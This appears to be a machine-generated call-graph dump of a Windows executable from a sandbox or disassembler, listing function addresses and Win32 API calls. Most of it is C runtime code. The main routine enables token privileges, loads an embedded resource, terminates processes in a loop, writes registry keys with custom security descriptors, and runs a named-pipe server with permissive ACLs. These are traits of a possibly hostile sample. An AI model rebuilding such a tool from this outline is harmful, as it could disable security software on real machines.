__free_lconv_num 5 API calls 6918->6920 6919->6913 6920->6919 6922 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6921->6922 6923 140005c88 6922->6923 6924 140005f3c Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6923->6924 6925 140005c96 6924->6925 6925->6915 6950 140009864 GetProcessHeap 6926 140005428 6929 1400053ac 6926->6929 6928 140005451 6930 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6929->6930 6931 1400053ca 6930->6931 6932 140005403 6931->6932 6933 140009764 5 API calls 6931->6933 6932->6928 6933->6931 6542 1400061ec 6543 1400061fc 6542->6543 6544 140006207 __vcrt_uninitialize_ptd 6543->6544 6545 140006120 _invalid_parameter_noinfo 5 API calls 6543->6545 6545->6544 6951 140002270 6952 140002280 6951->6952 6966 14000536c 6952->6966 6954 14000228c 6972 1400029a0 6954->6972 6956 1400022f9 6957 140002c90 __scrt_fastfail 7 API calls 6956->6957 6965 140002315 6956->6965 6959 140002325 6957->6959 6958 1400022a4 _RTC_Initialize 6958->6956 6977 140002b50 6958->6977 6961 1400022b9 6980 140004bb8 6961->6980 6963 1400022c5 6963->6956 7011 140005458 6963->7011 6967 14000537d 6966->6967 6968 14000663c _set_fmode 5 API calls 6967->6968 6969 140005385 6967->6969 6970 140005394 6968->6970 6969->6954 6971 140006460 _invalid_parameter_noinfo 5 API calls 6970->6971 6971->6969 6973 1400029b1 6972->6973 6976 1400029b6 __scrt_acquire_startup_lock 6972->6976 6974 140002c90 __scrt_fastfail 7 API calls 6973->6974 6973->6976 6975 140002a2a 6974->6975 6976->6958 7018 140002b14 6977->7018 6979 140002b59 6979->6961 6981 140004bd8 6980->6981 7001 140004bef 6980->7001 6982 140004bf6 6981->6982 6983 140004be0 6981->6983 6985 1400081c8 30 API calls 6982->6985 6984 14000663c _set_fmode 5 API calls 6983->6984 6986 140004be5 6984->6986 6987 140004bfb 6985->6987 6989 140006460 _invalid_parameter_noinfo 5 API calls 6986->6989 7059 14000797c GetModuleFileNameW 6987->7059 6989->7001 6995 140004c85 6998 140004994 21 API calls 6995->6998 6996 140004c6d 6997 14000663c _set_fmode 5 API calls 6996->6997 6999 140004c72 6997->6999 7003 140004ca1 6998->7003 7000 140006e64 __free_lconv_num 5 API calls 6999->7000 7000->7001 7001->6963 7002 140006e64 __free_lconv_num 5 API calls 7002->7001 7004 140004cd3 7003->7004 7005 140004cec 7003->7005 7010 140004ca7 7003->7010 7006 140006e64 __free_lconv_num 5 API calls 7004->7006 7008 140006e64 __free_lconv_num 5 API calls 7005->7008 7007 140004cdc 7006->7007 7009 140006e64 __free_lconv_num 5 API calls 7007->7009 7008->7010 7009->7001 7010->7002 7012 140005fa4 21 API calls 7011->7012 7013 140005465 7012->7013 7014 140005499 7013->7014 7015 14000663c _set_fmode 5 API calls 7013->7015 7014->6956 7016 14000548e 7015->7016 7017 140006460 _invalid_parameter_noinfo 5 API calls 7016->7017 7017->7014 7019 140002b2e 7018->7019 7021 140002b27 7018->7021 7022 1400058c8 7019->7022 7021->6979 7025 140005514 7022->7025 7024 14000590a 7024->7021 7026 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 7025->7026 7027 140005530 7026->7027 7030 14000558c 7027->7030 7029 140005539 7029->7024 7031 1400055b8 7030->7031 7032 14000564d 7030->7032 7031->7032 7033 140005629 7031->7033 7040 1400097cc 7031->7040 7032->7029 7033->7032 7035 1400097cc 6 API calls 7033->7035 7037 140005643 7035->7037 7036 14000561f 7038 140006e64 __free_lconv_num 5 API calls 7036->7038 7039 140006e64 __free_lconv_num 5 API calls 7037->7039 7038->7033 7039->7032 7041 1400097ee 7040->7041 7043 14000980b 7040->7043 7042 1400097fc 7041->7042 7041->7043 7044 14000663c _set_fmode 5 API calls 7042->7044 7047 14000b130 7043->7047 7046 140009801 __scrt_fastfail 7044->7046 7046->7036 7048 14000b145 7047->7048 7049 14000b14f 7047->7049 7050 140006d8c 5 API calls 7048->7050 7051 14000b154 7049->7051 7057 14000b15b _invalid_parameter_noinfo 7049->7057 7055 14000b14d 7050->7055 7054 140006e64 __free_lconv_num 5 API calls 7051->7054 7052 14000b161 7056 14000663c _set_fmode 5 API calls 7052->7056 7053 14000b18e HeapReAlloc 7053->7055 7053->7057 7054->7055 7055->7046 7056->7055 7057->7052 7057->7053 7058 140004714 _invalid_parameter_noinfo EnterCriticalSection 7057->7058 7058->7057 7060 1400079c2 try_get_function 7059->7060 7061 1400079d6 7059->7061 7064 1400065cc 5 API calls 7060->7064 7062 1400043a0 21 API calls 7061->7062 7063 140007a04 7062->7063 7070 140007a15 7063->7070 7083 14000691c 7063->7083 7065 1400079cf 7064->7065 7068 140002200 _handle_error 8 API calls 7065->7068 7069 140004c12 7068->7069 7071 140004994 7069->7071 7086 140007868 7070->7086 7073 1400049d2 7071->7073 7072 140008578 21 API calls 7072->7073 7073->7072 7075 140004a38 7073->7075 7074 140004b2b 7077 140004b58 7074->7077 7075->7074 7076 140008578 21 API calls 7075->7076 7076->7075 7078 140004b70 7077->7078 7082 140004ba8 7077->7082 7079 140006dec _invalid_parameter_noinfo 5 API calls 7078->7079 7078->7082 7080 140004b9e 7079->7080 7081 140006e64 __free_lconv_num 5 API calls 7080->7081 7081->7082 7082->6995 7082->6996 7084 1400066f4 try_get_function GetProcAddress 7083->7084 7085 14000693c 7084->7085 7085->7070 7087 1400078a5 7086->7087 7094 14000788c 7086->7094 7088 140008610 WideCharToMultiByte 7087->7088 7092 1400078aa 7087->7092 7089 1400078fd 7088->7089 7091 140007904 try_get_function 7089->7091 7089->7092 7093 14000792d 7089->7093 7090 14000663c _set_fmode 5 API calls 7090->7094 7091->7094 7096 1400065cc 5 API calls 7091->7096 7092->7090 7092->7094 7095 140008610 WideCharToMultiByte 7093->7095 7094->7065 7095->7091 7097 140007911 7096->7097 7098 14000663c _set_fmode 5 API calls 7097->7098 7098->7094 6546 14000d9f6 6547 14000da0e 6546->6547 6553 14000da79 6546->6553 6547->6553 6554 1400039dc 6547->6554 6550 1400039dc 24 API calls 6551 14000da70 6550->6551 6552 140005a88 21 API calls 6551->6552 6552->6553 6560 1400039f8 6554->6560 6556 1400039ea 6556->6550 6558 140005b08 21 API calls 6559 1400039f4 6558->6559 6561 140003a17 try_get_function 6560->6561 6562 1400039e5 6560->6562 6572 140003d6c 6561->6572 6562->6556 6562->6558 6577 140003b90 6572->6577 6576 14000e2c0 6578 140003ca8 TlsGetValue 6577->6578 6579 140003bd3 try_get_function 6577->6579 6578->6576 6579->6578 6580 140003c97 GetProcAddress 6579->6580 6580->6578 7288 140005177 7289 140005a88 21 API calls 7288->7289 7290 14000517c 7289->7290 6416 140002338 6417 140002e74 6416->6417 6418 140002341 SetUnhandledExceptionFilter 6417->6418 6419 1400054cc 6418->6419 6420 1400054e5 6419->6420 6421 14000663c _set_fmode 5 API calls 6419->6421 6422 1400054da 6421->6422 6423 140006460 _invalid_parameter_noinfo 5 API calls 6422->6423 6423->6420 6934 140002838 6937 140003548 6934->6937 6936 140002861 6938 14000359e __std_exception_copy 6937->6938 6939 140003569 6937->6939 6938->6936 6939->6938 6941 140005aa8 6939->6941 6942 140005abf 6941->6942 6943 140005ab5 6941->6943 6944 14000663c _set_fmode 5 API calls 6942->6944 6943->6942 6948 140005ada 6943->6948 6945 140005ac6 6944->6945 6946 140006460 _invalid_parameter_noinfo 5 API calls 6945->6946 6947 140005ad2 6946->6947 6947->6938 6948->6947 6949 14000663c _set_fmode 5 API calls 6948->6949 6949->6945 7197 140009ef8 7198 140009f22 7197->7198 7199 140006dec _invalid_parameter_noinfo 5 API calls 7198->7199 7200 140009f41 7199->7200 7201 140006e64 __free_lconv_num 5 API calls 7200->7201 7202 140009f4f 7201->7202 7203 140006dec _invalid_parameter_noinfo 5 API calls 7202->7203 7207 140009f79 7202->7207 7204 140009f6b 7203->7204 7206 140006e64 __free_lconv_num 5 API calls 7204->7206 7205 140006acc 2 API calls 7205->7207 7206->7207 7207->7205 7208 140009f82 7207->7208 7354 1400071bc 7355 1400071e2 7354->7355 7365 1400071f8 7354->7365 7356 14000663c _set_fmode 5 API calls 7355->7356 7357 1400071e7 7356->7357 7359 140006460 _invalid_parameter_noinfo 5 API calls 7357->7359 7358 140007265 7361 140004b58 5 API calls 7358->7361 7360 1400071f1 7359->7360 7367 1400072d8 7361->7367 7362 14000734d 7364 140006e64 __free_lconv_num 5 API calls 7362->7364 7366 140007258 7364->7366 7365->7358 7365->7366 7373 1400073c8 7365->7373 7368 14000738e 7366->7368 7369 140006e64 __free_lconv_num 5 API calls 7366->7369 7367->7362 7372 1400073b0 7367->7372 7393 14000a730 7367->7393 7370 140006e64 __free_lconv_num 5 API calls 7368->7370 7369->7366 7370->7360 7374 1400073f6 7373->7374 7374->7374 7375 140006dec _invalid_parameter_noinfo 5 API calls 7374->7375 7376 140007441 7375->7376 7377 14000a730 5 API calls 7376->7377 7378 140007477 7377->7378 7379 1400043a0 21 API calls 7378->7379 7380 14000762b 7379->7380 7381 14000691c GetProcAddress 7380->7381 7382 140007659 7381->7382 7402 140006eb8 7382->7402 7385 1400076dc 7386 1400043a0 21 API calls 7385->7386 7387 14000770f 7386->7387 7388 14000691c GetProcAddress 7387->7388 7389 140007737 7388->7389 7423 140007030 7389->7423 7392 1400073c8 23 API calls 7394 14000a748 7393->7394 7396 14000a74d 7394->7396 7399 14000a792 7394->7399 7400 14000a763 7394->7400 7395 14000663c _set_fmode 5 API calls 7397 14000a757 7395->7397 7396->7395 7396->7400 7398 140006460 _invalid_parameter_noinfo 5 API calls 7397->7398 7398->7400 7399->7400 7401 14000663c _set_fmode 5 API calls 7399->7401 7400->7367 7401->7397 7403 140006f03 7402->7403 7406 140006ee1 7402->7406 7404 140006f07 7403->7404 7405 140006f5c 7403->7405 7409 140006f1b 7404->7409 7411 140006e64 __free_lconv_num 5 API calls 7404->7411 7414 140006eef FindFirstFileExW 7404->7414 7407 1400085b4 MultiByteToWideChar 7405->7407 7408 140006e64 __free_lconv_num 5 API calls 7406->7408 7406->7414 7416 140006f77 7407->7416 7408->7414 7412 140006d8c 5 API calls 7409->7412 7410 140006f7e try_get_function 7410->7414 7418 1400065cc 5 API calls 7410->7418 7411->7409 7412->7414 7413 140006fb7 7413->7414 7415 1400085b4 MultiByteToWideChar 7413->7415 7414->7385 7415->7410 7416->7410 7416->7413 7417 140006fab 7416->7417 7419 140006e64 __free_lconv_num 5 API calls 7416->7419 7420 140006d8c 5 API calls 7417->7420 7421 140006f8b 7418->7421 7419->7417 7420->7413 7422 14000663c _set_fmode 5 API calls 7421->7422 7422->7414 7424 140007059 7423->7424 7425 14000707b 7423->7425 7428 140006e64 __free_lconv_num 5 API calls 7424->7428 7435 140007067 7424->7435 7426 1400070d4 7425->7426 7427 140007080 7425->7427 7429 140008610 WideCharToMultiByte 7426->7429 7430 140007094 7427->7430 7431 140006e64 __free_lconv_num 5 API calls 7427->7431 7427->7435 7428->7435 7437 1400070f8 7429->7437 7432 140006d8c 5 API calls 7430->7432 7431->7430 7432->7435 7433 1400070ff try_get_function 7433->7435 7441 1400065cc 5 API calls 7433->7441 7434 14000713a 7434->7435 7438 140008610 WideCharToMultiByte 7434->7438 7435->7392 7436 14000712f 7440 140006d8c 5 API calls 7436->7440 7437->7433 7437->7434 7437->7436 7439 140006e64 __free_lconv_num 5 API calls 7437->7439 7438->7433 7439->7436 7440->7434 7442 14000710c 7441->7442 7443 14000663c _set_fmode 5 API calls 7442->7443 7443->7435 7099 140002e7d 7100 140002eb8 7099->7100 7101 140002e9c 7099->7101 7101->7100 7108 140003758 7101->7108 7106 140005a88 21 API calls 7107 140002ede 7106->7107 7109 1400039dc 24 API calls 7108->7109 7110 140002eca 7109->7110 7111 14000376c 7110->7111 7112 1400039dc 24 API calls 7111->7112 7113 140002ed6 7112->7113 7113->7106 7209 14000b0fd 7210 14000663c _set_fmode 5 API calls 7209->7210 7211 14000b102 7210->7211 7212 140006460 _invalid_parameter_noinfo 5 API calls 7211->7212 7213 14000b10d 7212->7213 6424 140001f00 AllocateAndInitializeSid 6425 140001f72 SetEntriesInAclW 6424->6425 6426 1400020e5 6424->6426 6425->6426 6427 140001fb8 LocalAlloc 6425->6427 6429 140002200 _handle_error 8 API calls 6426->6429 6427->6426 6428 140001fd8 InitializeSecurityDescriptor 6427->6428 6428->6426 6431 140001fec SetSecurityDescriptorDacl 6428->6431 6430 1400020fb 6429->6430 6431->6426 6432 140002007 6431->6432 6433 140002020 CreateNamedPipeW 6432->6433 6434 140002070 ConnectNamedPipe 6433->6434 6435 140002060 Sleep 6433->6435 6436 1400020cf Sleep 6434->6436 6437 14000207f ReadFile 6434->6437 6435->6433 6438 1400020da DisconnectNamedPipe 6436->6438 6437->6438 6439 14000209f WriteFile DisconnectNamedPipe 6437->6439 6438->6434 6439->6434 7215 140004d40 7216 140004d59 7215->7216 7225 140004d55 7215->7225 7217 1400081c8 30 API calls 7216->7217 7218 140004d5e 7217->7218 7227 1400086a8 GetEnvironmentStringsW 7218->7227 7221 140004d6b 7224 140006e64 __free_lconv_num 5 API calls 7221->7224 7224->7225 7226 140006e64 __free_lconv_num 5 API calls 7226->7221 7228 1400086d6 7227->7228 7238 140008778 7227->7238 7231 140008610 WideCharToMultiByte 7228->7231 7229 140008782 FreeEnvironmentStringsW 7230 140004d63 7229->7230 7230->7221 7239 140004dac 7230->7239 7232 140008728 7231->7232 7233 140006d8c 5 API calls 7232->7233 7232->7238 7234 140008737 7233->7234 7235 140008610 WideCharToMultiByte 7234->7235 7236 140008761 7234->7236 7235->7236 7237 140006e64 __free_lconv_num 5 API calls 7236->7237 7237->7238 7238->7229 7238->7230 7240 140004dd3 7239->7240 7241 140006dec _invalid_parameter_noinfo 5 API calls 7240->7241 7250 140004e08 7241->7250 7242 140004e77 7243 140006e64 __free_lconv_num 5 API calls 7242->7243 7244 140004d78 7243->7244 7244->7226 7245 140006dec _invalid_parameter_noinfo 5 API calls 7245->7250 7246 140004e68 7254 140004eb4 7246->7254 7248 140005aa8 __std_exception_copy 5 API calls 7248->7250 7250->7242 7250->7245 7250->7246 7250->7248 7251 140004e9f 7250->7251 7253 140006e64 __free_lconv_num 5 API calls 7250->7253 7252 140006e64 __free_lconv_num 5 API calls 7252->7242 7253->7250 7258 140004eb9 7254->7258 7259 140004e70 7254->7259 7255 140004ee2 7257 140006e64 __free_lconv_num 5 API calls 7255->7257 7256 140006e64 __free_lconv_num 5 API calls 7256->7258 7257->7259 7258->7255 7258->7256 7259->7252 7291 140002780 7292 140003548 __std_exception_copy 5 API calls 7291->7292 7293 1400027a9 7292->7293 7294 14000a380 7295 14000a3ad 7294->7295 7296 14000663c _set_fmode 5 API calls 7295->7296 7301 14000a3c2 __vcrt_FlsSetValue 7295->7301 7297 14000a3b7 7296->7297 7298 140006460 _invalid_parameter_noinfo 5 API calls 7297->7298 7298->7301 7299 140002200 _handle_error 8 API calls 7300 14000a71f 7299->7300 7301->7299 7444 14000d9c0 7447 140004780 7444->7447 7446 14000d9d6 7448 140006120 _invalid_parameter_noinfo 5 API calls 7447->7448 7449 14000479e __vcrt_FlsSetValue 7448->7449 7449->7446 7214 140002501 TerminateProcess 6581 14000a804 6582 14000a823 6581->6582 6583 14000a89c 6582->6583 6585 14000a833 6582->6585 6589 1400025e4 6583->6589 6587 140002200 _handle_error 8 API calls 6585->6587 6588 14000a892 6587->6588 6592 1400025f8 IsProcessorFeaturePresent 6589->6592 6593 14000260e 6592->6593 6598 140002694 RtlCaptureContext RtlLookupFunctionEntry 6593->6598 6599 1400026c4 RtlVirtualUnwind 6598->6599 6600 140002622 6598->6600 6599->6600 6601 1400024dc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6600->6601 7260 140008d44 7261 140008d50 7260->7261 7263 140008d77 7261->7263 7264 140008890 7261->7264 7265 140008895 7264->7265 7266 1400088d0 7264->7266 7267 1400088b6 DeleteCriticalSection 7265->7267 7268 1400088c8 7265->7268 7266->7261 7267->7267 7267->7268 7269 140006e64 __free_lconv_num 5 API calls 7268->7269 7269->7266 6374 140008d08 6375 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6374->6375 6376 140008d18 6375->6376 6383 1400088e0 6376->6383 6378 140008d21 6379 140008d2f 6378->6379 6393 140008b0c GetStartupInfoW 6378->6393 6384 140008928 6383->6384 6385 1400088ff 6383->6385 6387 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6384->6387 6386 14000663c _set_fmode 5 API calls 6385->6386 6388 140008904 6386->6388 6392 140008932 6387->6392 6389 140006460 _invalid_parameter_noinfo 5 API calls 6388->6389 6390 140008910 6389->6390 6390->6378 6392->6390 6404 1400087e8 6392->6404 6394 140008b41 6393->6394 6395 140008bdb 6393->6395 6394->6395 6396 1400088e0 6 API calls 6394->6396 6399 140008bfc 6395->6399 6397 140008b6a 6396->6397 6397->6395 6398 140008b94 GetFileType 6397->6398 6398->6397 6400 140008c1a 6399->6400 6401 140008c75 GetStdHandle 6400->6401 6402 140008ced 6400->6402 6401->6400 6403 140008c88 GetFileType 6401->6403 6402->6379 6403->6400 6405 140006dec _invalid_parameter_noinfo 5 API calls 6404->6405 6408 140008809 6405->6408 6406 14000886b 6407 140006e64 __free_lconv_num 5 API calls 6406->6407 6409 140008875 6407->6409 6408->6406 6411 140006acc 6408->6411 6409->6392 6412 1400066f4 try_get_function GetProcAddress 6411->6412 6413 140006b02 6412->6413 6414 140006b17 InitializeCriticalSectionAndSpinCount 6413->6414 6415 140006b0c __vcrt_FlsSetValue 6413->6415 6414->6415 6415->6408 7175 1400024c8 7178 140002b68 7175->7178 7179 140002b8b GetSystemTimeAsFileTime GetCurrentThreadId 7178->7179 7180 1400024d1 7178->7180 7183 14000e1c0 7179->7183 7270 140005948 7273 140004f30 7270->7273 7280 140004ef8 7273->7280 7278 140004eb4 5 API calls 7279 140004f58 7278->7279 7281 140004f08 7280->7281 7282 140004f0d 7280->7282 7283 140004eb4 5 API calls 7281->7283 7284 140004f14 7282->7284 7283->7282 7285 140004f24 7284->7285 7286 140004f29 7284->7286 7287 140004eb4 5 API calls 7285->7287 7286->7278 7287->7286 7114 14000a08c 7115 14000a0b4 7114->7115 7122 14000a0c2 7114->7122 7116 1400043a0 21 API calls 7115->7116 7115->7122 7117 14000a0e0 7116->7117 7118 14000a0ee 7117->7118 7119 14000a110 7117->7119 7130 14000c094 7118->7130 7119->7122 7133 14000c048 7119->7133 7124 14000a154 7126 14000a189 7124->7126 7128 1400085b4 MultiByteToWideChar 7124->7128 7125 14000a1a6 7127 1400085b4 MultiByteToWideChar 7125->7127 7126->7122 7129 14000663c _set_fmode 5 API calls 7126->7129 7127->7126 7128->7126 7129->7122 7136 14000c428 7130->7136 7134 1400043a0 21 API calls 7133->7134 7135 14000a150 7134->7135 7135->7124 7135->7125 7138 14000c485 7136->7138 7141 14000c491 7136->7141 7137 140002200 _handle_error 8 API calls 7140 14000c0a7 7137->7140 7138->7137 7139 14000663c _set_fmode 5 API calls 7139->7138 7140->7122 7141->7138 7141->7139 7302 14000518c 7303 1400051f3 7302->7303 7309 1400051a9 __scrt_is_managed_app 7302->7309 7314 140005084 7303->7314 7305 14000522f 7306 140005235 7305->7306 7319 140005248 7305->7319 7309->7303 7311 140005294 GetModuleHandleExW 7309->7311 7312 1400052d1 try_get_function __vcrt_FlsSetValue 7311->7312 7313 1400052ba GetProcAddress 7311->7313 7312->7303 7313->7312 7315 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 7314->7315 7316 1400050a0 7315->7316 7326 1400050bc 7316->7326 7318 1400050a9 7318->7305 7342 1400087ac 7319->7342 7322 140005282 7324 140005294 2 API calls 7322->7324 7323 140005271 GetCurrentProcess TerminateProcess 7323->7322 7325 140005289 ExitProcess 7324->7325 7327 1400050d2 __vcrt_FlsSetValue 7326->7327 7328 14000512b 7326->7328 7327->7328 7330 140005864 7327->7330 7328->7318 7333 140005550 7330->7333 7332 140005899 7332->7328 7334 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 7333->7334 7335 14000556c 7334->7335 7338 14000573c 7335->7338 7337 140005575 7337->7332 7339 14000576a __vcrt_FlsSetValue 7338->7339 7340 140005762 7338->7340 7339->7340 7341 140006e64 __free_lconv_num 5 API calls 7339->7341 7340->7337 7341->7340 7343 1400087ca 7342->7343 7344 140005255 7342->7344 7346 1400068cc 7343->7346 7344->7322 7344->7323 7347 1400066f4 try_get_function GetProcAddress 7346->7347 7348 1400068f4 7347->7348 7348->7344 7349 14000858c GetCommandLineA GetCommandLineW 6602 14000cc10 6603 14000cc21 CloseHandle 6602->6603 6604 14000cc27 6602->6604 6603->6604 7142 14000ac90 7143 14000ac98 7142->7143 7144 14000acad 7143->7144 7145 14000acc6 7143->7145 7146 14000663c _set_fmode 5 API calls 7144->7146 7149 1400043a0 21 API calls 7145->7149 7150 14000acbd 7145->7150 7147 14000acb2 7146->7147 7148 140006460 _invalid_parameter_noinfo 5 API calls 7147->7148 7148->7150 7149->7150 5711 140002354 5731 140002954 5711->5731 5714 1400024a0 5796 140002c90 IsProcessorFeaturePresent 5714->5796 5715 140002370 __scrt_acquire_startup_lock 5717 1400024aa 5715->5717 5724 14000238e __vcrt_FlsSetValue __scrt_release_startup_lock 5715->5724 5718 140002c90 __scrt_fastfail 7 API calls 5717->5718 5719 1400024b5 5718->5719 5720 140002439 5737 140002ddc 5720->5737 5722 14000243e 5740 140004f70 5722->5740 5724->5720 5730 1400023b3 5724->5730 5787 140005324 5724->5787 5728 14000245a __scrt_is_managed_app 5728->5719 5792 140002ae8 5728->5792 5803 140002f84 5731->5803 5734 140002368 5734->5714 5734->5715 5735 140002983 __scrt_initialize_crt 5735->5734 5805 1400036c8 5735->5805 5813 1400037b0 5737->5813 5815 1400081c8 5740->5815 5742 140002446 5745 140001000 5742->5745 5744 140004f7f 5744->5742 5821 140008578 5744->5821 6304 140001ac0 5745->6304 5747 140001044 __scrt_fastfail 5748 140001063 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 5747->5748 5749 140001ac0 20 API calls 5748->5749 5750 1400010d1 5749->5750 6322 140004680 5750->6322 5754 1400010e0 __security_init_cookie 5755 1400010e6 OpenProcess 5754->5755 5756 14000117b FindResourceA 5755->5756 5757 1400010fe OpenProcessToken 5755->5757 5760 14000119b SizeofResource 5756->5760 5761 1400013ed 5756->5761 5758 140001172 CloseHandle 5757->5758 5759 140001115 LookupPrivilegeValueW 5757->5759 5758->5756 5759->5758 5762 14000112d AdjustTokenPrivileges 5759->5762 5760->5761 5764 1400011b4 LoadResource 5760->5764 5763 140002200 _handle_error 8 API calls 5761->5763 5762->5758 5767 14000116c try_get_function 5762->5767 5765 1400013fe 5763->5765 5764->5761 5766 1400011c8 LockResource 5764->5766 5765->5728 5768 1400011de __security_init_cookie 5766->5768 5767->5758 6328 140002268 5768->6328 5772 140001260 5774 140001268 RegCreateKeyExW 5772->5774 5773 140001203 5773->5772 5778 14000122f OpenProcess 5773->5778 5775 1400012ab ConvertStringSecurityDescriptorToSecurityDescriptorW 5774->5775 5776 14000137d CreateThread 5774->5776 5779 1400012f3 RegCreateKeyExW 5775->5779 5780 1400012d3 RegSetKeySecurity LocalFree 5775->5780 5777 14000222c 5776->5777 5783 1400013a9 CreateThread 5777->5783 5778->5773 5784 140001242 TerminateProcess CloseHandle 5778->5784 5781 140001372 RegCloseKey 5779->5781 5782 140001330 __security_init_cookie 5779->5782 5780->5779 5781->5776 5786 140001336 RegSetValueExW RegCloseKey 5782->5786 5785 1400013e0 Sleep SleepEx 5783->5785 5784->5773 5785->5761 5786->5781 5788 140005348 5787->5788 5789 14000535a 5787->5789 5788->5720 6369 140005a88 5789->6369 5794 140002af9 5792->5794 5793 140002b09 5793->5730 5794->5793 5795 1400036c8 __scrt_initialize_crt DeleteCriticalSection 5794->5795 5795->5793 5797 140002cb5 __scrt_fastfail 5796->5797 5798 140002cd4 RtlCaptureContext RtlLookupFunctionEntry 5797->5798 5799 140002d39 __scrt_fastfail 5798->5799 5800 140002cfd RtlVirtualUnwind 5798->5800 5801 140002d6b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5799->5801 5800->5799 5802 140002dbd __scrt_fastfail 5801->5802 5802->5717 5804 140002976 __scrt_dllmain_crt_thread_attach 5803->5804 5804->5734 5804->5735 5806 1400036da 5805->5806 5807 1400036d0 __vcrt_uninitialize_ptd 5805->5807 5806->5734 5809 140003b58 5807->5809 5810 140003b83 5809->5810 5811 140003b66 DeleteCriticalSection 5810->5811 5812 140003b87 5810->5812 5811->5810 5812->5806 5814 140002df3 GetStartupInfoW 5813->5814 5814->5722 5816 1400081d5 5815->5816 5820 14000821a 5815->5820 5825 140006078 5816->5825 5820->5744 5822 140008500 5821->5822 5823 1400043a0 21 API calls 5822->5823 5824 140008524 5823->5824 5824->5744 5826 14000608e 5825->5826 5827 140006089 5825->5827 5832 140006096 5826->5832 5873 140006a30 5826->5873 5868 1400069e8 5827->5868 5830 1400060ad 5830->5832 5876 140006dec 5830->5876 5836 140006110 5832->5836 5892 140005b08 5832->5892 5850 140007f4c 5836->5850 5837 1400060de 5840 140006a30 _invalid_parameter_noinfo GetProcAddress 5837->5840 5838 1400060ce 5839 140006a30 _invalid_parameter_noinfo GetProcAddress 5838->5839 5841 1400060d5 5839->5841 5842 1400060e6 5840->5842 5882 140006e64 5841->5882 5843 1400060ea 5842->5843 5844 1400060fc 5842->5844 5846 140006a30 _invalid_parameter_noinfo GetProcAddress 5843->5846 5887 140005d54 5844->5887 5846->5841 5849 140006e64 __free_lconv_num 5 API calls 5849->5832 6145 140008110 5850->6145 5852 140007f75 6158 140007c58 5852->6158 5855 140007f8f 5855->5820 5857 14000803b 5858 140006e64 __free_lconv_num 5 API calls 5857->5858 5858->5855 5862 140008036 5863 14000663c _set_fmode 5 API calls 5862->5863 5863->5857 5864 140008098 5864->5857 6182 140007a9c 5864->6182 5865 14000805b 5865->5864 5866 140006e64 __free_lconv_num 5 API calls 5865->5866 5866->5864 5901 1400066f4 5868->5901 5872 14000e2c0 5874 1400066f4 try_get_function GetProcAddress 5873->5874 5875 140006a5e __vcrt_FlsSetValue 5874->5875 5875->5830 5880 140006dfd _invalid_parameter_noinfo 5876->5880 5877 140006e4e 5908 14000663c 5877->5908 5879 1400060c0 5879->5837 5879->5838 5880->5877 5880->5879 5905 140004714 5880->5905 5883 140006e69 HeapFree 5882->5883 5886 140006e89 try_get_function __free_lconv_num 5882->5886 5884 140006e84 5883->5884 5883->5886 5885 14000663c _set_fmode 4 API calls 5884->5885 5885->5886 5886->5832 5939 140005c2c 5887->5939 5889 140005e06 5942 140005cac 5889->5942 5891 140005e1b 5891->5849 6063 140009990 5892->6063 5895 140005b20 5897 140005b53 5895->5897 5898 140005b29 IsProcessorFeaturePresent 5895->5898 5899 140005b38 5898->5899 6084 14000624c 5899->6084 5902 140006755 TlsGetValue 5901->5902 5903 140006750 try_get_function 5901->5903 5902->5872 5903->5902 5904 140006846 GetProcAddress 5903->5904 5904->5902 5911 140004744 5905->5911 5916 140006120 5908->5916 5910 140006645 5910->5879 5914 140006d1c EnterCriticalSection 5911->5914 5915 14000e21d 5914->5915 5917 140006135 try_get_function 5916->5917 5918 140006147 5917->5918 5920 1400069e8 _invalid_parameter_noinfo 2 API calls 5917->5920 5919 140006a30 _invalid_parameter_noinfo GetProcAddress 5918->5919 5922 14000614f SetLastError 5918->5922 5921 14000616a 5919->5921 5920->5918 5921->5922 5924 140006dec _invalid_parameter_noinfo 4 API calls 5921->5924 5922->5910 5925 14000617d 5924->5925 5926 14000619b 5925->5926 5927 14000618b 5925->5927 5928 140006a30 _invalid_parameter_noinfo GetProcAddress 5926->5928 5929 140006a30 _invalid_parameter_noinfo GetProcAddress 5927->5929 5930 1400061a3 5928->5930 5931 140006192 5929->5931 5932 1400061a7 5930->5932 5933 1400061b9 5930->5933 5936 140006e64 __free_lconv_num 4 API calls 5931->5936 5934 140006a30 _invalid_parameter_noinfo GetProcAddress 5932->5934 5935 140005d54 _invalid_parameter_noinfo 4 API calls 5933->5935 5934->5931 5937 1400061c1 5935->5937 5936->5922 5938 140006e64 __free_lconv_num 4 API calls 5937->5938 5938->5922 5940 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5939->5940 5941 140005c48 5940->5941 5941->5889 5943 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5942->5943 5944 140005cc8 5943->5944 5947 140005f3c 5944->5947 5946 140005cde 5946->5891 5948 140005f84 Concurrency::details::SchedulerProxy::DeleteThis 5947->5948 5949 140005f58 Concurrency::details::SchedulerProxy::DeleteThis 5947->5949 5948->5946 5949->5948 5951 140009450 5949->5951 5952 1400094ec 5951->5952 5955 140009473 5951->5955 5953 14000953f 5952->5953 5956 140006e64 __free_lconv_num 5 API calls 5952->5956 6017 1400095f0 5953->6017 5955->5952 5960 140006e64 __free_lconv_num 5 API calls 5955->5960 5962 1400094b2 5955->5962 5957 140009510 5956->5957 5958 140006e64 __free_lconv_num 5 API calls 5957->5958 5961 140009524 5958->5961 5959 1400094d4 5963 140006e64 __free_lconv_num 5 API calls 5959->5963 5965 1400094a6 5960->5965 5966 140006e64 __free_lconv_num 5 API calls 5961->5966 5962->5959 5967 140006e64 __free_lconv_num 5 API calls 5962->5967 5969 1400094e0 5963->5969 5964 14000954b 5968 1400095aa 5964->5968 5974 140006e64 5 API calls __free_lconv_num 5964->5974 5977 140008d84 5965->5977 5972 140009533 5966->5972 5973 1400094c8 5967->5973 